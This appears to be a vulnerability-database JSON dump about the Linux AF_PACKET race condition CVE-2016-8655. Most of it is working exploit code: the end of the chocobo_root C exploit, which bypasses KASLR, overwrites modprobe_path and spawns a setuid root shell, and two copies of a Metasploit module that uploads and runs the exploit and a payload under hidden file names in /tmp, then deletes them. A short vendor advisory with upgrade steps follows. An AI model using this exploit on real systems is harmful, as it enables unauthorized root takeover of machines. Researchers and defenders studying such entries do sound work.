unsigned long addr = 0;\r\n\r\n addr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_sysmap();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_syslog();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_mincore();\r\n if (addr) return addr;\r\n\r\n dprintf(\"[-] KASLR bypass failed\\n\");\r\n exit(EXIT_FAILURE);\r\n\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n fd = open(SYSCTL_PATH, O_WRONLY);\r\n\r\n if(fd == -1) {\r\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(buf, '\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\r\n\r\n write(fd, buf, strlen(buf)+1);\r\n\r\n socket(AF_INET, SOCK_STREAM, 132);\r\n\r\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\r\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd, \"/sbin/modprobe\", 15);\r\n close(fd);\r\n execl(buf, buf, NULL);\r\n } else {\r\n dprintf(\"[-] could not create rootshell\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nvoid setup_sandbox() {\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n char buf[512], *f;\r\n\r\n if (getuid() == 0 && geteuid() == 0) {\r\n chown(\"/proc/self/exe\", 0, 0);\r\n chmod(\"/proc/self/exe\", 06755);\r\n exit(0);\r\n }\r\n\r\n if (getuid() != 0 && geteuid() == 0) {\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\r\n exit(0);\r\n }\r\n\r\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n 
dprintf(\"[.] starting\\n\");\r\n\r\n dprintf(\"[.] checking hardware\\n\");\r\n check_procs();\r\n dprintf(\"[~] done, hardware looks good\\n\");\r\n\r\n dprintf(\"[.] checking kernel version\\n\");\r\n detect_versions();\r\n dprintf(\"[~] done, version looks good\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\r\n KERNEL_BASE = get_kernel_addr();\r\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\r\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\r\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\r\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\r\n\r\n pid = fork();\r\n if (pid == 0) {\r\n dprintf(\"[.] setting up namespace sandbox\\n\");\r\n setup_sandbox();\r\n dprintf(\"[~] done, namespace sandbox set up\\n\");\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47170"}, {"lastseen": "2018-05-24T14:24:04", "description": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit). CVE-2016-8655. Local exploit for Linux platform. 
Tags: Metasploit Frame...", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44696", "href": "https://www.exploit-db.com/exploits/44696/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a race condition and use-after-free in the\r\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\r\n the Linux kernel to execute code as root (CVE-2016-8655).\r\n\r\n The bug was initially introduced in 2011 and patched in 2016 in version\r\n 4.4.0-53.74, potentially affecting a large number of kernels; however\r\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\r\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\r\n Linux Mint.\r\n\r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n\r\n Bypasses for SMEP, SMAP and KASLR are included. 
Failed exploitation\r\n may crash the kernel.\r\n\r\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\r\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\r\n versions 4.4.0-45-generic and 4.4.0-51-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rebel', # Discovery and chocobo_root.c exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Aug 12 2016',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'chocobo_root.c' ],\r\n [ 'EDB', '40871' ],\r\n [ 'CVE', '2016-8655' ],\r\n [ 'BID', '94692' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\r\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\r\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n\r\n def timeout\r\n datastore['TIMEOUT'].to_i\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n 
upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n\r\n arch = kernel_hardware\r\n unless arch.include? 
'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('chocobo_root.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('chocobo_root')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status \"Launching exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\r\n rm_f 
executable_path\r\n rm_f payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44696/"}], "metasploit": [{"lastseen": "2020-10-13T19:41:37", "description": "This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).\n", "published": "2018-05-07T07:11:07", "type": "metasploit", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\n 'Description' => %q{\n This 
module exploits a race condition and use-after-free in the\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on\n\n Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64);\n Ubuntu 16.04 (x86_64); and\n Ubuntu 16.04.2 (x86_64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rebel', # Discovery and chocobo_root.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2016-08-12',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '40871' ],\n [ 'CVE', '2016-8655' ],\n [ 'BID', '94692' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/607' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\n ],\n 'Notes' =>\n {\n 'AKA' => ['chocobo_root.c'],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 
'Stability' => [ CRASH_OS_DOWN ]\n },\n 'DefaultTarget' => 0\n ))\n register_options [\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def timeout\n datastore['TIMEOUT'].to_i\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n return CheckCode::Safe(\"System architecture #{arch} is not supported\")\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\\[\\] = \\{(.+?)\\};/m).flatten.first\n kernels = offsets.scan(/\"(.+?)\"/).flatten\n\n version = \"#{kernel_release} #{kernel_version.split(' ').first}\"\n unless kernels.include? version\n return CheckCode::Safe(\"Linux kernel #{version} is not vulnerable\")\n end\n vprint_good \"Linux kernel #{version} is vulnerable\"\n\n if smap_enabled?\n return CheckCode::Safe('SMAP is enabled')\n end\n vprint_good 'SMAP is not enabled'\n\n if lkrg_installed?\n return CheckCode::Safe('LKRG is installed')\n end\n vprint_good 'LKRG is not installed'\n\n if grsec_installed?\n return CheckCode::Safe('grsecurity is in use')\n end\n vprint_good 'grsecurity is not in use'\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n return CheckCode::Safe(\"System has less than #{min_required_cores} CPU cores\")\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n return CheckCode::Unknown('Could not retrieve kernel config')\n end\n\n unless config.include? 
'CONFIG_USER_NS=y'\n return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n return CheckCode::Safe('Unprivileged user namespaces are not permitted')\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, exploit_data('CVE-2016-8655', 'chocobo_root.c'), '-lpthread'\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('CVE-2016-8655', 'chocobo_root')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status \"Launching exploit (Timeout: #{timeout})...\"\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb"}, {"lastseen": "2020-12-30T06:54:57", "description": "This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).\n", "published": "2018-05-07T07:11:07", "type": "metasploit", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\n 'Description' => %q{\n This module exploits a race condition and use-after-free in the\n packet_set_ring function in 
net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on\n\n Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64);\n Ubuntu 16.04 (x86_64); and\n Ubuntu 16.04.2 (x86_64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rebel', # Discovery and chocobo_root.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2016-08-12',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '40871' ],\n [ 'CVE', '2016-8655' ],\n [ 'BID', '94692' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/607' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\n ],\n 'Notes' =>\n {\n 'AKA' => ['chocobo_root.c'],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ]\n },\n 'DefaultTarget' => 0\n ))\n register_options [\n 
OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def timeout\n datastore['TIMEOUT'].to_i\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n return CheckCode::Safe(\"System architecture #{arch} is not supported\")\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\\[\\] = \\{(.+?)\\};/m).flatten.first\n kernels = offsets.scan(/\"(.+?)\"/).flatten\n\n version = \"#{kernel_release} #{kernel_version.split(' ').first}\"\n unless kernels.include? version\n return CheckCode::Safe(\"Linux kernel #{version} is not vulnerable\")\n end\n vprint_good \"Linux kernel #{version} is vulnerable\"\n\n if smap_enabled?\n return CheckCode::Safe('SMAP is enabled')\n end\n vprint_good 'SMAP is not enabled'\n\n if lkrg_installed?\n return CheckCode::Safe('LKRG is installed')\n end\n vprint_good 'LKRG is not installed'\n\n if grsec_installed?\n return CheckCode::Safe('grsecurity is in use')\n end\n vprint_good 'grsecurity is not in use'\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n return CheckCode::Safe(\"System has less than #{min_required_cores} CPU cores\")\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n return CheckCode::Unknown('Could not retrieve kernel config')\n end\n\n unless config.include? 
'CONFIG_USER_NS=y'\n return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n return CheckCode::Safe('Unprivileged user namespaces are not permitted')\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, exploit_data('CVE-2016-8655', 'chocobo_root.c'), '-lpthread'\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('CVE-2016-8655', 'chocobo_root')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status \"Launching exploit (Timeout: #{timeout})...\"\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb"}], "myhack58": [{"lastseen": "2016-12-15T15:16:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "edition": 1, "description": "Dear UCloud users:\n\nA high-risk race condition vulnerability has been confirmed in the Linux kernel. Exploiting it lets a low-privileged process execute kernel code, so the impact is serious. Please check whether the kernel you are using is in the affected range and upgrade promptly.\n\n**Scope of impact**\n\nCentOS 5 and 6 are not affected\nCentOS 7 is not affected by default (it becomes affected once user namespaces are enabled)\nUbuntu 12.04 and 14.04 are affected\nDebian 7 and 8 are affected\n\n**Solution**\n\nPlease back up your work first, to avoid problems if something goes wrong after the kernel fix\n1. Compile the fix yourself; the fix code can be downloaded from: \nhttp://t.cn/RI7nIH3 \n2. Download the update through the package manager; after updating, a reboot is required for it to take effect: \n1\uff09CentOS 7 upgrade method: \nNo official fix package has been released yet\n2\uff09Ubuntu: \nsudo apt-get update \nsudo apt-get install linux-image-generic \nsudo reboot \nCheck the system version with uname -a; if it shows the following, the upgrade succeeded: \nubuntu 14.04 : 3.13.0-105.152 \nubuntu 12.04 : 3.2.0-118.161 \n3\uff09Debian: \nThe official website has not yet published an update package\n\n**Vulnerability details**\n\nCVE-2016-8655: a race condition vulnerability in Linux (net/packet/af_packet.c) that can allow a low-privileged process to obtain kernel code execution. The vulnerability has existed since as early as 2011 (v3.2-rc1) and was fixed in November 2016 in v4.9-rc8. 
\nPOC: https://www.exploit-db.com/exploits/40871/\n", "modified": "2016-12-15T00:00:00", "published": "2016-12-15T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82103.htm", "id": "MYHACK58:62201682103", "type": "myhack58", "title": "UCloud-201612-002: Linux kernel through kill to mention the right vulnerability Security Alert-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-24T09:00:32", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655", "CVE-2017-6074"], "edition": 1, "description": "Vulnerability number\nCVE-2017-6074 \nVulnerability overview\nThe Linux kernel has recently also been found to contain a privilege escalation vulnerability that can be traced back to 2005. It affects the major Linux distributions, including Redhat, Debian, OpenSUSE and Ubuntu. Using this vulnerability, an attacker can achieve kernel code execution from a low-privileged process. The oldest version currently known to be affected is 2.6.18 (September 2006), but the vulnerability may already have existed in earlier versions, possibly since DCCP support was introduced in 2.6.14 in October 2005. \nIn the advisory published on Seclists.org, the author Andrey Konovalov said that a PoC will be released soon, to allow time for the fix to be applied. \nSecurity researcher Andrey Konovalov recently used the Syzkaller fuzzing tool to discover this vulnerability in the Linux kernel's DCCP protocol implementation, which had lain dormant for more than 10 years. \nDCCP Protocol \nDCCP is a message-oriented transport layer protocol that minimizes packet header overhead and endpoint processing work. The protocol can establish, maintain and tear down unreliable connection-oriented data streams and provides congestion control for unreliable streams. 
